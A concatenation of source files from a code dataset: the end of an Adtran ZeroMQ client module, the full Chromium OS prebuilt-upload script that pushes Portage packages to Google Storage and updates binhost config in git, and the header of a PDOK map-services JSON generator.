# TODO: This is not yet supported
(pon_index, onu_id) = struct.unpack_from('!II', packet)
msg = binascii.hexlify(packet[8:])
return pon_index, onu_id, msg, False
class ZmqPairConnection(ZmqConnection):
"""
Bidirectional messages to/from the socket.
Wrapper around ZeroMQ PAIR socket.
"""
socketType = constants.PAIR
def messageReceived(self, message):
"""
Called on incoming message from ZeroMQ.
:param message: message data
"""
self.onReceive(message)
def onReceive(self, message):
"""
Called on incoming message received from other end of the pair.
:param message: message data
"""
raise NotImplementedError(self)
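# --- Hedged usage sketch (not part of the original module; the address and
# OMCI hex payload below are illustrative assumptions) ---
#
# def _on_rx(message):
#     pon, onu, frame, is_omci = AdtranZmqClient.decode_packet(message)
#     log.debug('omci-rx', pon=pon, onu=onu, is_omci=is_omci)
#
# client = AdtranZmqClient('192.0.2.1', rx_callback=_on_rx)
# client.send(AdtranZmqClient.encode_omci_message('000f', pon_index=0, onu_id=1))
# ...
# client.shutdown()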
authors: [email protected]

path: /src/third_party/chromite/scripts/upload_prebuilts.py
repo_name: webosce/chromium53
detected_licenses: BSD-3-Clause, LicenseRef-scancode-unknown-license-reference, Apache-2.0, LicenseRef-scancode-public-domain, LGPL-2.0-or-later, GPL-1.0-or-later, MIT
license_type: permissive
language: Python
length_bytes: 36787
# Copyright (c) 2012 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This script is used to upload host prebuilts as well as board BINHOSTS.
Prebuilts are uploaded using gsutil to Google Storage. After these prebuilts
are successfully uploaded, a file is updated with the proper BINHOST version.
To read more about prebuilts/binhost binary packages please refer to:
http://goto/chromeos-prebuilts
Example of uploading prebuilt amd64 host files to Google Storage:
upload_prebuilts -p /b/cbuild/build -s -u gs://chromeos-prebuilt
Example of uploading x86-dogfood binhosts to Google Storage:
upload_prebuilts -b x86-dogfood -p /b/cbuild/build/ -u gs://chromeos-prebuilt -g
"""
from __future__ import print_function
import argparse
import datetime
import functools
import glob
import multiprocessing
import os
import sys
import tempfile
from chromite.cbuildbot import constants
from chromite.cbuildbot import commands
from chromite.lib import binpkg
from chromite.lib import commandline
from chromite.lib import cros_build_lib
from chromite.lib import cros_logging as logging
from chromite.lib import git
from chromite.lib import gs
from chromite.lib import osutils
from chromite.lib import parallel
from chromite.lib import portage_util
from chromite.lib import toolchain
# How many times to retry uploads.
_RETRIES = 10
# Multiplier for how long to sleep (in seconds) between retries; will delay
# (1*sleep) the first time, then (2*sleep), continuing via attempt * sleep.
_SLEEP_TIME = 60
# The length of time (in seconds) that Portage should wait before refetching
# binpkgs from the same binhost. We don't ever modify binhosts, so this should
# be something big.
_BINPKG_TTL = 60 * 60 * 24 * 365
_HOST_PACKAGES_PATH = 'chroot/var/lib/portage/pkgs'
_CATEGORIES_PATH = 'chroot/etc/portage/categories'
_PYM_PATH = 'chroot/usr/lib/portage/pym'
_HOST_ARCH = 'amd64'
_BOARD_PATH = 'chroot/build/%(board)s'
_REL_BOARD_PATH = 'board/%(target)s/%(version)s'
_REL_HOST_PATH = 'host/%(host_arch)s/%(target)s/%(version)s'
# Private overlays to look at for builds to filter
# relative to build path
_PRIVATE_OVERLAY_DIR = 'src/private-overlays'
_GOOGLESTORAGE_GSUTIL_FILE = 'googlestorage_acl.txt'
_BINHOST_BASE_URL = 'gs://chromeos-prebuilt'
_PREBUILT_BASE_DIR = 'src/third_party/chromiumos-overlay/chromeos/config/'
# Created in the event of new host targets becoming available
_PREBUILT_MAKE_CONF = {'amd64': os.path.join(_PREBUILT_BASE_DIR,
'make.conf.amd64-host')}
class BuildTarget(object):
"""A board/variant/profile tuple."""
def __init__(self, board_variant, profile=None):
self.board_variant = board_variant
self.board, _, self.variant = board_variant.partition('_')
self.profile = profile
def __str__(self):
if self.profile:
return '%s_%s' % (self.board_variant, self.profile)
else:
return self.board_variant
def __eq__(self, other):
return str(other) == str(self)
def __hash__(self):
return hash(str(self))
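# A hedged worked example (board names are illustrative):
#   t = BuildTarget('x86-generic_embedded', profile='minimal')
#   t.board == 'x86-generic'; t.variant == 'embedded'
#   str(t) == 'x86-generic_embedded_minimal'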
def UpdateLocalFile(filename, value, key='PORTAGE_BINHOST'):
"""Update the key in file with the value passed.
File format:
key="value"
Note quotes are added automatically
Args:
filename: Name of file to modify.
value: Value to write with the key.
key: The variable key to update. (Default: PORTAGE_BINHOST)
Returns:
True if changes were made to the file.
"""
if os.path.exists(filename):
file_fh = open(filename)
else:
file_fh = open(filename, 'w+')
file_lines = []
found = False
made_changes = False
keyval_str = '%(key)s=%(value)s'
for line in file_fh:
# Strip newlines from end of line. We already add newlines below.
line = line.rstrip("\n")
if len(line.split('=')) != 2:
# Skip any line that doesn't fit key=val.
file_lines.append(line)
continue
file_var, file_val = line.split('=')
if file_var == key:
found = True
print('Updating %s=%s to %s="%s"' % (file_var, file_val, key, value))
value = '"%s"' % value
made_changes |= (file_val != value)
file_lines.append(keyval_str % {'key': key, 'value': value})
else:
file_lines.append(keyval_str % {'key': file_var, 'value': file_val})
if not found:
value = '"%s"' % value
made_changes = True
file_lines.append(keyval_str % {'key': key, 'value': value})
file_fh.close()
# write out new file
osutils.WriteFile(filename, '\n'.join(file_lines) + '\n')
return made_changes
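# A hedged worked example (file name and values are illustrative): given a
# make.conf line PORTAGE_BINHOST="gs://old", calling
# UpdateLocalFile('make.conf', 'gs://new') rewrites that line to
# PORTAGE_BINHOST="gs://new" and returns True because the value changed.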
def RevGitFile(filename, data, retries=5, dryrun=False):
"""Update and push the git file.
Args:
filename: file to modify that is in a git repo already
data: A dict of key/values to update in |filename|
retries: The number of times to retry before giving up, default: 5
dryrun: If True, do not actually commit the change.
"""
prebuilt_branch = 'prebuilt_branch'
cwd = os.path.abspath(os.path.dirname(filename))
commit = git.RunGit(cwd, ['rev-parse', 'HEAD']).output.rstrip()
description = '%s: updating %s' % (os.path.basename(filename),
', '.join(data.keys()))
# UpdateLocalFile will print out the keys/values for us.
print('Revving git file %s' % filename)
try:
git.CreatePushBranch(prebuilt_branch, cwd)
for key, value in data.iteritems():
UpdateLocalFile(filename, value, key)
git.RunGit(cwd, ['add', filename])
git.RunGit(cwd, ['commit', '-m', description])
git.PushWithRetry(prebuilt_branch, cwd, dryrun=dryrun, retries=retries)
finally:
git.RunGit(cwd, ['checkout', commit])
def GetVersion():
"""Get the version to put in LATEST and update the git version with."""
return datetime.datetime.now().strftime('%Y.%m.%d.%H%M%S')
def _GsUpload(gs_context, acl, local_file, remote_file):
"""Upload to GS bucket.
Args:
gs_context: A lib.gs.GSContext instance.
acl: The ACL to use for uploading the file.
local_file: The local file to be uploaded.
remote_file: The remote location to upload to.
"""
CANNED_ACLS = ['public-read', 'private', 'bucket-owner-read',
'authenticated-read', 'bucket-owner-full-control',
'public-read-write']
if acl in CANNED_ACLS:
gs_context.Copy(local_file, remote_file, acl=acl)
else:
# For private uploads we assume that the overlay board is set up properly
# and a googlestore_acl.xml is present. Otherwise, this script errors.
# We set version=0 here to ensure that the ACL is set only once (see
# http://b/15883752#comment54).
try:
gs_context.Copy(local_file, remote_file, version=0)
except gs.GSContextPreconditionFailed as ex:
# If we received a GSContextPreconditionFailed error, we know that the
# file exists now, but we don't know whether our specific update
# succeeded. See http://b/15883752#comment62
logging.warning(
'Assuming upload succeeded despite PreconditionFailed errors: %s', ex)
if acl.endswith('.xml'):
# Apply the passed in ACL xml file to the uploaded object.
gs_context.SetACL(remote_file, acl=acl)
else:
gs_context.ChangeACL(remote_file, acl_args_file=acl)
def RemoteUpload(gs_context, acl, files, pool=10):
"""Upload to google storage.
Create a pool of process and call _GsUpload with the proper arguments.
Args:
gs_context: A lib.gs.GSContext instance.
acl: The canned acl used for uploading. acl can be one of: "public-read",
"public-read-write", "authenticated-read", "bucket-owner-read",
"bucket-owner-full-control", or "private".
files: dictionary with keys to local files and values to remote path.
pool: integer of maximum processes to have at the same time.
Returns:
Return a set of tuple arguments of the failed uploads
"""
upload = functools.partial(_GsUpload, gs_context, acl)
tasks = [[key, value] for key, value in files.iteritems()]
parallel.RunTasksInProcessPool(upload, tasks, pool)
def GenerateUploadDict(base_local_path, base_remote_path, pkgs):
"""Build a dictionary of local remote file key pairs to upload.
Args:
base_local_path: The base path to the files on the local hard drive.
base_remote_path: The base path to the remote paths.
pkgs: The packages to upload.
Returns:
Returns a dictionary of local_path/remote_path pairs
"""
upload_files = {}
for pkg in pkgs:
suffix = pkg['CPV'] + '.tbz2'
local_path = os.path.join(base_local_path, suffix)
assert os.path.exists(local_path), '%s does not exist' % local_path
upload_files[local_path] = os.path.join(base_remote_path, suffix)
if pkg.get('DEBUG_SYMBOLS') == 'yes':
debugsuffix = pkg['CPV'] + '.debug.tbz2'
local_path = os.path.join(base_local_path, debugsuffix)
assert os.path.exists(local_path)
upload_files[local_path] = os.path.join(base_remote_path, debugsuffix)
return upload_files
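# A hedged worked example (paths and CPV are illustrative; the local .tbz2
# must already exist, per the assert above):
#   GenerateUploadDict('/b/pkgs', 'gs://bucket/board/ver/packages',
#                      [{'CPV': 'app-misc/foo-1.0'}])
#   => {'/b/pkgs/app-misc/foo-1.0.tbz2':
#       'gs://bucket/board/ver/packages/app-misc/foo-1.0.tbz2'}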
def GetBoardOverlay(build_path, target):
"""Get the path to the board variant.
Args:
build_path: The path to the root of the build directory
target: The target board as a BuildTarget object.
Returns:
The last overlay configured for the given board as a string.
"""
board = target.board_variant
overlays = portage_util.FindOverlays(constants.BOTH_OVERLAYS, board,
buildroot=build_path)
# We only care about the last entry.
return overlays[-1]
def DeterminePrebuiltConfFile(build_path, target):
"""Determine the prebuilt.conf file that needs to be updated for prebuilts.
Args:
build_path: The path to the root of the build directory
target: String representation of the board. This includes host and board
targets
Returns:
A string path to a prebuilt.conf file to be updated.
"""
if _HOST_ARCH == target:
# We are host.
# Without more examples of hosts this is a kludge for now.
# TODO(Scottz): as new host targets come online expand this to
# work more like boards.
make_path = _PREBUILT_MAKE_CONF[target]
else:
# We are a board
board = GetBoardOverlay(build_path, target)
make_path = os.path.join(board, 'prebuilt.conf')
return make_path
def UpdateBinhostConfFile(path, key, value):
"""Update binhost config file with key=value.
Args:
path: Filename to update.
key: Key to update.
value: New value for key.
"""
cwd, filename = os.path.split(os.path.abspath(path))
osutils.SafeMakedirs(cwd)
if not git.GetCurrentBranch(cwd):
git.CreatePushBranch(constants.STABLE_EBUILD_BRANCH, cwd, sync=False)
osutils.WriteFile(path, '', mode='a')
if UpdateLocalFile(path, value, key):
desc = '%s: %s %s' % (filename, 'updating' if value else 'clearing', key)
git.AddPath(path)
git.Commit(cwd, desc)
def GenerateHtmlIndex(files, index, board, version):
"""Given the list of |files|, generate an index.html at |index|.
Args:
files: The list of files to link to.
index: The path to the html index.
board: Name of the board this index is for.
version: Build version this index is for.
"""
head = """<html>
<head>
<title>Package Prebuilt Index: %(board)s / %(version)s</title>
</head>
<body>
<h2>Package Prebuilt Index: %(board)s / %(version)s</h2>"""
head %= {
'board': board,
'version': version,
}
files = files + [
'.|Google Storage Index',
'..|',
]
commands.GenerateHtmlIndex(index, files, head=head)
def _GrabAllRemotePackageIndexes(binhost_urls):
"""Grab all of the packages files associated with a list of binhost_urls.
Args:
binhost_urls: The URLs for the directories containing the Packages files we
want to grab.
Returns:
A list of PackageIndex objects.
"""
pkg_indexes = []
for url in binhost_urls:
pkg_index = binpkg.GrabRemotePackageIndex(url)
if pkg_index:
pkg_indexes.append(pkg_index)
return pkg_indexes
class PrebuiltUploader(object):
"""Synchronize host and board prebuilts."""
def __init__(self, upload_location, acl, binhost_base_url, pkg_indexes,
build_path, packages, skip_upload, binhost_conf_dir, dryrun,
target, slave_targets, version):
"""Constructor for prebuilt uploader object.
This object can upload host or prebuilt files to Google Storage.
Args:
upload_location: The upload location.
acl: The canned acl used for uploading to Google Storage. acl can be one
of: "public-read", "public-read-write", "authenticated-read",
"bucket-owner-read", "bucket-owner-full-control", "project-private",
or "private" (see "gsutil help acls"). If we are not uploading to
Google Storage, this parameter is unused.
binhost_base_url: The URL used for downloading the prebuilts.
pkg_indexes: Old uploaded prebuilts to compare against. Instead of
uploading duplicate files, we just link to the old files.
build_path: The path to the directory containing the chroot.
packages: Packages to upload.
skip_upload: Don't actually upload the tarballs.
binhost_conf_dir: Directory where to store binhost.conf files.
dryrun: Don't push or upload prebuilts.
target: BuildTarget managed by this builder.
slave_targets: List of BuildTargets managed by slave builders.
version: A unique string, intended to be included in the upload path,
which identifies the version number of the uploaded prebuilts.
"""
self._upload_location = upload_location
self._acl = acl
self._binhost_base_url = binhost_base_url
self._pkg_indexes = pkg_indexes
self._build_path = build_path
self._packages = set(packages)
self._found_packages = set()
self._skip_upload = skip_upload
self._binhost_conf_dir = binhost_conf_dir
self._dryrun = dryrun
self._target = target
self._slave_targets = slave_targets
self._version = version
self._gs_context = gs.GSContext(retries=_RETRIES, sleep=_SLEEP_TIME,
dry_run=self._dryrun)
def _Upload(self, local_file, remote_file):
"""Wrapper around _GsUpload"""
_GsUpload(self._gs_context, self._acl, local_file, remote_file)
def _ShouldFilterPackage(self, pkg):
if not self._packages:
return False
pym_path = os.path.abspath(os.path.join(self._build_path, _PYM_PATH))
sys.path.insert(0, pym_path)
# pylint: disable=F0401
import portage.versions
cat, pkgname = portage.versions.catpkgsplit(pkg['CPV'])[0:2]
cp = '%s/%s' % (cat, pkgname)
self._found_packages.add(cp)
return pkgname not in self._packages and cp not in self._packages
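# Hedged example (package names are illustrative): with self._packages set
# to {'foo'}, a pkg whose CPV is 'app-misc/foo-1.0' yields pkgname 'foo' and
# cp 'app-misc/foo', so it is kept (returns False); any package matching
# neither name is filtered out (returns True).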
def _UploadPrebuilt(self, package_path, url_suffix):
"""Upload host or board prebuilt files to Google Storage space.
Args:
package_path: The path to the packages dir.
url_suffix: The remote subdirectory where we should upload the packages.
"""
# Process Packages file, removing duplicates and filtered packages.
pkg_index = binpkg.GrabLocalPackageIndex(package_path)
pkg_index.SetUploadLocation(self._binhost_base_url, url_suffix)
pkg_index.RemoveFilteredPackages(self._ShouldFilterPackage)
uploads = pkg_index.ResolveDuplicateUploads(self._pkg_indexes)
unmatched_pkgs = self._packages - self._found_packages
if unmatched_pkgs:
logging.warning('unable to match packages: %r' % unmatched_pkgs)
# Write Packages file.
pkg_index.header['TTL'] = _BINPKG_TTL
tmp_packages_file = pkg_index.WriteToNamedTemporaryFile()
remote_location = '%s/%s' % (self._upload_location.rstrip('/'), url_suffix)
assert remote_location.startswith('gs://')
# Build list of files to upload. Manually include the dev-only files but
# skip them if not present.
# TODO(deymo): Upload dev-only-extras.tbz2 as dev-only-extras.tar.bz2
# outside packages/ directory. See crbug.com/448178 for details.
if os.path.exists(os.path.join(package_path, 'dev-only-extras.tbz2')):
uploads.append({'CPV': 'dev-only-extras'})
upload_files = GenerateUploadDict(package_path, remote_location, uploads)
remote_file = '%s/Packages' % remote_location.rstrip('/')
upload_files[tmp_packages_file.name] = remote_file
RemoteUpload(self._gs_context, self._acl, upload_files)
with tempfile.NamedTemporaryFile(
prefix='chromite.upload_prebuilts.index.') as index:
GenerateHtmlIndex(
[x[len(remote_location) + 1:] for x in upload_files.values()],
index.name, self._target, self._version)
self._Upload(index.name, '%s/index.html' % remote_location.rstrip('/'))
link_name = 'Prebuilts[%s]: %s' % (self._target, self._version)
url = '%s%s/index.html' % (gs.PUBLIC_BASE_HTTPS_URL,
remote_location[len(gs.BASE_GS_URL):])
logging.PrintBuildbotLink(link_name, url)
def _UploadSdkTarball(self, board_path, url_suffix, prepackaged,
toolchains_overlay_tarballs,
toolchains_overlay_upload_path,
toolchain_tarballs, toolchain_upload_path):
"""Upload a tarball of the sdk at the specified path to Google Storage.
Args:
board_path: The path to the board dir.
url_suffix: The remote subdirectory where we should upload the packages.
prepackaged: If given, a tarball that has been packaged outside of this
script and should be used.
toolchains_overlay_tarballs: List of toolchains overlay tarball
specifications to upload. Items take the form
"toolchains_spec:/path/to/tarball".
toolchains_overlay_upload_path: Path template under the bucket to place
toolchains overlay tarballs.
toolchain_tarballs: List of toolchain tarballs to upload.
toolchain_upload_path: Path under the bucket to place toolchain tarballs.
"""
remote_location = '%s/%s' % (self._upload_location.rstrip('/'), url_suffix)
assert remote_location.startswith('gs://')
boardname = os.path.basename(board_path.rstrip('/'))
# We do not upload non-SDK board tarballs.
assert boardname == constants.CHROOT_BUILDER_BOARD
assert prepackaged is not None
version_str = self._version[len('chroot-'):]
remote_tarfile = toolchain.GetSdkURL(
for_gsutil=True, suburl='cros-sdk-%s.tar.xz' % (version_str,))
# For SDK, also upload the manifest which is guaranteed to exist
# by the builderstage.
self._Upload(prepackaged + '.Manifest', remote_tarfile + '.Manifest')
self._Upload(prepackaged, remote_tarfile)
# Upload SDK toolchains overlays and toolchain tarballs, if given.
for tarball_list, upload_path, qualifier_name in (
(toolchains_overlay_tarballs, toolchains_overlay_upload_path,
'toolchains'),
(toolchain_tarballs, toolchain_upload_path, 'target')):
for tarball_spec in tarball_list:
qualifier_val, local_path = tarball_spec.split(':')
suburl = upload_path % {qualifier_name: qualifier_val}
remote_path = toolchain.GetSdkURL(for_gsutil=True, suburl=suburl)
self._Upload(local_path, remote_path)
# Finally, also update the pointer to the latest SDK on which polling
# scripts rely.
with osutils.TempDir() as tmpdir:
pointerfile = os.path.join(tmpdir, 'cros-sdk-latest.conf')
remote_pointerfile = toolchain.GetSdkURL(for_gsutil=True,
suburl='cros-sdk-latest.conf')
osutils.WriteFile(pointerfile, 'LATEST_SDK="%s"' % version_str)
self._Upload(pointerfile, remote_pointerfile)
def _GetTargets(self):
"""Returns the list of targets to use."""
targets = self._slave_targets[:]
if self._target:
targets.append(self._target)
return targets
def SyncHostPrebuilts(self, key, git_sync, sync_binhost_conf):
"""Synchronize host prebuilt files.
This function will sync both the standard host packages, plus the host
packages associated with all targets that have been "setup" with the
current host's chroot. For instance, if this host has been used to build
x86-generic, it will sync the host packages associated with
'i686-pc-linux-gnu'. If this host has also been used to build arm-generic,
it will also sync the host packages associated with
'armv7a-cros-linux-gnueabi'.
Args:
key: The variable key to update in the git file.
git_sync: If set, update make.conf of target to reference the latest
prebuilt packages generated here.
sync_binhost_conf: If set, update binhost config file in
chromiumos-overlay for the host.
"""
# Slave boards are listed before the master board so that the master board
# takes priority (i.e. x86-generic preflight host prebuilts take priority
# over preflight host prebuilts from other builders).
binhost_urls = []
for target in self._GetTargets():
url_suffix = _REL_HOST_PATH % {'version': self._version,
'host_arch': _HOST_ARCH,
'target': target}
packages_url_suffix = '%s/packages' % url_suffix.rstrip('/')
if self._target == target and not self._skip_upload:
# Upload prebuilts.
package_path = os.path.join(self._build_path, _HOST_PACKAGES_PATH)
self._UploadPrebuilt(package_path, packages_url_suffix)
# Record URL where prebuilts were uploaded.
binhost_urls.append('%s/%s/' % (self._binhost_base_url.rstrip('/'),
packages_url_suffix.rstrip('/')))
binhost = ' '.join(binhost_urls)
if git_sync:
git_file = os.path.join(self._build_path, _PREBUILT_MAKE_CONF[_HOST_ARCH])
RevGitFile(git_file, {key: binhost}, dryrun=self._dryrun)
if sync_binhost_conf:
binhost_conf = os.path.join(
self._binhost_conf_dir, 'host', '%s-%s.conf' % (_HOST_ARCH, key))
UpdateBinhostConfFile(binhost_conf, key, binhost)
def SyncBoardPrebuilts(self, key, git_sync, sync_binhost_conf,
upload_board_tarball, prepackaged_board,
toolchains_overlay_tarballs,
toolchains_overlay_upload_path,
toolchain_tarballs, toolchain_upload_path):
"""Synchronize board prebuilt files.
Args:
key: The variable key to update in the git file.
git_sync: If set, update make.conf of target to reference the latest
prebuilt packages generated here.
sync_binhost_conf: If set, update binhost config file in
chromiumos-overlay for the current board.
upload_board_tarball: Include a tarball of the board in our upload.
prepackaged_board: A tarball of the board built outside of this script.
toolchains_overlay_tarballs: List of toolchains overlay tarball
specifications to upload. Items take the form
"toolchains_spec:/path/to/tarball".
toolchains_overlay_upload_path: Path template under the bucket to place
toolchains overlay tarballs.
toolchain_tarballs: A list of toolchain tarballs to upload.
toolchain_upload_path: Path under the bucket to place toolchain tarballs.
"""
updated_binhosts = set()
for target in self._GetTargets():
board_path = os.path.join(self._build_path,
_BOARD_PATH % {'board': target.board_variant})
package_path = os.path.join(board_path, 'packages')
url_suffix = _REL_BOARD_PATH % {'target': target,
'version': self._version}
packages_url_suffix = '%s/packages' % url_suffix.rstrip('/')
# Process the target board differently if it is the main --board.
if self._target == target and not self._skip_upload:
# This strips "chroot" prefix because that is sometimes added as the
# --prepend-version argument (e.g. by chromiumos-sdk bot).
# TODO(build): Clean it up to be less hard-coded.
version_str = self._version[len('chroot-'):]
# Upload board tarballs in the background.
if upload_board_tarball:
if toolchain_upload_path:
toolchain_upload_path %= {'version': version_str}
if toolchains_overlay_upload_path:
toolchains_overlay_upload_path %= {'version': version_str}
tar_process = multiprocessing.Process(
target=self._UploadSdkTarball,
args=(board_path, url_suffix, prepackaged_board,
toolchains_overlay_tarballs,
toolchains_overlay_upload_path, toolchain_tarballs,
toolchain_upload_path))
tar_process.start()
# Upload prebuilts.
self._UploadPrebuilt(package_path, packages_url_suffix)
# Make sure we finished uploading the board tarballs.
if upload_board_tarball:
tar_process.join()
assert tar_process.exitcode == 0
# TODO(zbehan): This should be done cleaner.
if target.board == constants.CHROOT_BUILDER_BOARD:
sdk_conf = os.path.join(self._binhost_conf_dir,
'host/sdk_version.conf')
sdk_settings = {
'SDK_LATEST_VERSION': version_str,
'TC_PATH': toolchain_upload_path,
}
RevGitFile(sdk_conf, sdk_settings, dryrun=self._dryrun)
# Record URL where prebuilts were uploaded.
url_value = '%s/%s/' % (self._binhost_base_url.rstrip('/'),
packages_url_suffix.rstrip('/'))
if git_sync:
git_file = DeterminePrebuiltConfFile(self._build_path, target)
RevGitFile(git_file, {key: url_value}, dryrun=self._dryrun)
if sync_binhost_conf:
# Update the binhost configuration file in git.
binhost_conf = os.path.join(
self._binhost_conf_dir, 'target', '%s-%s.conf' % (target, key))
updated_binhosts.add(binhost_conf)
UpdateBinhostConfFile(binhost_conf, key, url_value)
if sync_binhost_conf:
# Clear all old binhosts. The files must be left empty in case anybody
# is referring to them.
all_binhosts = set(glob.glob(os.path.join(
self._binhost_conf_dir, 'target', '*-%s.conf' % key)))
for binhost_conf in all_binhosts - updated_binhosts:
UpdateBinhostConfFile(binhost_conf, key, '')
class _AddSlaveBoardAction(argparse.Action):
"""Callback that adds a slave board to the list of slave targets."""
def __call__(self, parser, namespace, values, option_string=None):
getattr(namespace, self.dest).append(BuildTarget(values))
class _AddSlaveProfileAction(argparse.Action):
"""Callback that adds a slave profile to the list of slave targets."""
def __call__(self, parser, namespace, values, option_string=None):
if not namespace.slave_targets:
parser.error('Must specify --slave-board before --slave-profile')
if namespace.slave_targets[-1].profile is not None:
parser.error('Cannot specify --slave-profile twice for same board')
namespace.slave_targets[-1].profile = values
def ParseOptions(argv):
"""Returns options given by the user and the target specified.
Args:
argv: The args to parse.
Returns:
A tuple containing a parsed options object and BuildTarget.
The target instance is None if no board is specified.
"""
parser = commandline.ArgumentParser()
parser.add_argument('-H', '--binhost-base-url', default=_BINHOST_BASE_URL,
help='Base URL to use for binhost in make.conf updates')
parser.add_argument('--previous-binhost-url', action='append', default=[],
help='Previous binhost URL')
parser.add_argument('-b', '--board',
help='Board type that was built on this machine')
parser.add_argument('-B', '--prepackaged-tarball', type='path',
help='Board tarball prebuilt outside of this script.')
parser.add_argument('--toolchains-overlay-tarball',
dest='toolchains_overlay_tarballs',
action='append', default=[],
help='Toolchains overlay tarball specification to '
'upload. Takes the form '
'"toolchains_spec:/path/to/tarball".')
parser.add_argument('--toolchains-overlay-upload-path', default='',
help='Path template for uploading toolchains overlays.')
parser.add_argument('--toolchain-tarball', dest='toolchain_tarballs',
action='append', default=[],
help='Redistributable toolchain tarball.')
parser.add_argument('--toolchain-upload-path', default='',
help='Path to place toolchain tarballs in the sdk tree.')
parser.add_argument('--profile',
help='Profile that was built on this machine')
parser.add_argument('--slave-board', default=[], action=_AddSlaveBoardAction,
dest='slave_targets',
help='Board type that was built on a slave machine. To '
'add a profile to this board, use --slave-profile.')
parser.add_argument('--slave-profile', action=_AddSlaveProfileAction,
help='Board profile that was built on a slave machine. '
'Applies to previous slave board.')
parser.add_argument('-p', '--build-path', required=True,
help='Path to the directory containing the chroot')
parser.add_argument('--packages', action='append', default=[],
help='Only include the specified packages. '
'(Default is to include all packages.)')
parser.add_argument('-s', '--sync-host', default=False, action='store_true',
help='Sync host prebuilts')
parser.add_argument('-g', '--git-sync', default=False, action='store_true',
help='Enable git version sync (This commits to a repo.) '
'This is used by full builders to commit directly '
'to board overlays.')
parser.add_argument('-u', '--upload',
help='Upload location')
parser.add_argument('-V', '--prepend-version',
help='Add an identifier to the front of the version')
parser.add_argument('-f', '--filters', action='store_true', default=False,
help='Turn on filtering of private ebuild packages')
parser.add_argument('-k', '--key', default='PORTAGE_BINHOST',
help='Key to update in make.conf / binhost.conf')
parser.add_argument('--set-version',
help='Specify the version string')
parser.add_argument('--sync-binhost-conf', default=False, action='store_true',
help='Update binhost.conf in chromiumos-overlay or '
'chromeos-overlay. Commit the changes, but don\'t '
'push them. This is used for preflight binhosts.')
parser.add_argument('--binhost-conf-dir',
help='Directory to commit binhost config with '
'--sync-binhost-conf.')
parser.add_argument('-P', '--private', action='store_true', default=False,
help='Mark gs:// uploads as private.')
parser.add_argument('--skip-upload', action='store_true', default=False,
help='Skip upload step.')
parser.add_argument('--upload-board-tarball', action='store_true',
default=False,
help='Upload board tarball to Google Storage.')
parser.add_argument('-n', '--dry-run', dest='dryrun',
action='store_true', default=False,
help='Don\'t push or upload prebuilts.')
options = parser.parse_args(argv)
if not options.upload and not options.skip_upload:
parser.error('you need to provide an upload location using -u')
if not options.set_version and options.skip_upload:
parser.error('If you are using --skip-upload, you must specify a '
'version number using --set-version.')
target = None
if options.board:
target = BuildTarget(options.board, options.profile)
if target in options.slave_targets:
parser.error('--board/--profile must not also be a slave target.')
if len(set(options.slave_targets)) != len(options.slave_targets):
parser.error('--slave-boards must not have duplicates.')
if options.slave_targets and options.git_sync:
parser.error('--slave-boards is not compatible with --git-sync')
if (options.upload_board_tarball and options.skip_upload and
options.board == 'amd64-host'):
parser.error('--skip-upload is not compatible with '
'--upload-board-tarball and --board=amd64-host')
if (options.upload_board_tarball and not options.skip_upload and
not options.upload.startswith('gs://')):
parser.error('--upload-board-tarball only works with gs:// URLs.\n'
'--upload must be a gs:// URL.')
if options.upload_board_tarball and options.prepackaged_tarball is None:
parser.error('--upload-board-tarball requires --prepackaged-tarball')
if options.private:
if options.sync_host:
parser.error('--private and --sync-host/-s cannot be specified '
'together; we do not support private host prebuilts')
if not options.upload or not options.upload.startswith('gs://'):
parser.error('--private is only valid for gs:// URLs; '
'--upload must be a gs:// URL.')
if options.binhost_base_url != _BINHOST_BASE_URL:
parser.error('when using --private the --binhost-base-url '
'is automatically derived.')
if options.sync_binhost_conf and not options.binhost_conf_dir:
parser.error('--sync-binhost-conf requires --binhost-conf-dir')
if (options.toolchains_overlay_tarballs and
not options.toolchains_overlay_upload_path):
parser.error('--toolchains-overlay-tarball requires '
'--toolchains-overlay-upload-path')
return options, target
def main(argv):
# Set umask to a sane value so that files created as root are readable.
os.umask(0o22)
options, target = ParseOptions(argv)
# Calculate a list of Packages index files to compare against. Whenever we
# upload a package, we check to make sure it's not already stored in one of
# the packages files we uploaded. This list of packages files might contain
# both board and host packages.
pkg_indexes = _GrabAllRemotePackageIndexes(options.previous_binhost_url)
if options.set_version:
version = options.set_version
else:
version = GetVersion()
if options.prepend_version:
version = '%s-%s' % (options.prepend_version, version)
acl = 'public-read'
binhost_base_url = options.binhost_base_url
if options.private:
binhost_base_url = options.upload
if target:
acl = portage_util.FindOverlayFile(_GOOGLESTORAGE_GSUTIL_FILE,
board=target.board_variant,
buildroot=options.build_path)
if acl is None:
cros_build_lib.Die('No Google Storage ACL file %s found in %s overlay.',
_GOOGLESTORAGE_GSUTIL_FILE, target.board_variant)
binhost_conf_dir = None
if options.binhost_conf_dir:
binhost_conf_dir = os.path.join(options.build_path,
options.binhost_conf_dir)
uploader = PrebuiltUploader(options.upload, acl, binhost_base_url,
pkg_indexes, options.build_path,
options.packages, options.skip_upload,
binhost_conf_dir, options.dryrun,
target, options.slave_targets, version)
if options.sync_host:
uploader.SyncHostPrebuilts(options.key, options.git_sync,
options.sync_binhost_conf)
if options.board or options.slave_targets:
uploader.SyncBoardPrebuilts(options.key, options.git_sync,
options.sync_binhost_conf,
options.upload_board_tarball,
options.prepackaged_tarball,
options.toolchains_overlay_tarballs,
options.toolchains_overlay_upload_path,
options.toolchain_tarballs,
options.toolchain_upload_path)
authors: [email protected]

path: /pdok2json.py
repo_name: evetion/pdokservicesplugin
detected_licenses: (none)
license_type: no_license
language: Python
length_bytes: 49510
# -*- coding: utf-8 -*-
"""
/***************************************************************************
PdokServicesPlugin pdok2json.py
This is a rough Python script that, for a series of service URLs
(WMS, WFS, WCS and WMTS), fetches the capabilities of each service and
builds a JSON object with some metadata for every 'layer' in that
service.
The JSON is used to create the file pdok.json, using python3
(NOTE: only python3 works right now, due to small encoding problems):
python3 pdok2json.py > pdok.json
That file is loaded by the PdokServicesPlugin to show all layers.
At the moment it works for all services listed in the 'services' object
at the bottom of this file.
The PDOK services are, however, a motley mix of versions and service
types, and here and there a small hack was needed to parse them all.
In theory you can add a couple of services yourself, but expect
hiccups :-)
begin : 2013-11-01
copyright : (C) 2012 by Richard Duivenvoorde
email : [email protected]
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
